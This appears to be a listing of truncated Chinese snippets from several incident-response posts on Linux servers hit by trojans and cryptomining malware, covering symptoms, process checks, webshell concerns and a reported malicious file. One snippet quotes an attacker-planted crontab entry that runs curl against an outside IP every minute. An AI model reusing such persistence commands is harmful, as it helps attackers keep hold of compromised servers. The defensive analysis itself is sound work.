开篇前言 Linux服务器一直给我们的印象是安全、稳定、可靠，性能卓越。由于一来Linux本身的安全机制，Linux上的病毒、木马较少，二则由于宣称Linux是最安全的操作系统，导致很多人对Linux的安全性有个误解：以为它永远不会感染病毒、木马；以为它没有安全漏洞。所以很多Linux ...

1、查看流量图发现问题 查看的时候网页非常卡，有的时候甚至没有响应 2、top动态查看进程 我马上远程登录出问题的服务器，远程操作很卡，网卡出去的流量非常大，通过top发现了一个异常的进程占用资源比较高，名字不仔细看还真以为是一个Web服务进程。 4、结束异常进程并继续追踪 ...

一、说明 如果出现文件上传漏洞和命令执行类漏洞（包括命令注入、缓冲区溢出、反序列化等）都会让人担心，系统是否系统已被上传webshell甚至植入木马程序。如果依靠人工排查，一是工作量大二是需要一定程度的技术知识和业务知识才能判断什么是正常什么是异常。工作量大决定排查工作不可能由个别具有技术知识 ...

/threads/413337/ 首先是下午14点左右有几台服务器出现流量超高，平时只有几百M的流 ...

如果是云服务器可以在‘云监控-态势与感知’中直接看到木马文件相关进程name，id以及路径如下：文件路径: /opt/apache-tomcat-7.0.104/bin/shell1.elf恶意文件md5: 91cc7f105856a0e9eb6a29ef3d08d9ce进程id: 27504 ...

一、什么是挖矿木马 挖矿木马会占用CPU进行超频运算，从而占用主机大量的CPU资源，严重影响服务器上的其他应用的正常运行。黑客为了得到更多的算力资源，一般都会对全网进行无差别扫描，同时利用SSH爆破和漏洞利用等手段攻击主机。部分挖矿木马还具备蠕虫化的特点，在主机被成功入侵之后，挖矿木马还会向内 ...

什么是挖矿木马 挖矿木马会占用CPU进行超频运算，从而占用主机大量的CPU资源，严重影响服务器上的其他应用的正常运行。黑客为了得到更多的算力资源，一般都会对全网进行无差别扫描，同时利用SSH爆破和漏洞利用等手段攻击主机。部分挖矿木马还具备蠕虫化的特点，在主机被成功入侵之后，挖矿木马还会向内网渗透 ...

最近emr集群跑任务的时候总出现 task failed ，优化sql，调提交任务参数都没解决，最后再我排查时候，发现一个从节点的cpu使用800% 经过一些列排查，发现是被注入木马了， #被人种下的crontab#* * * * * curl -s http://158.69.133.17 ...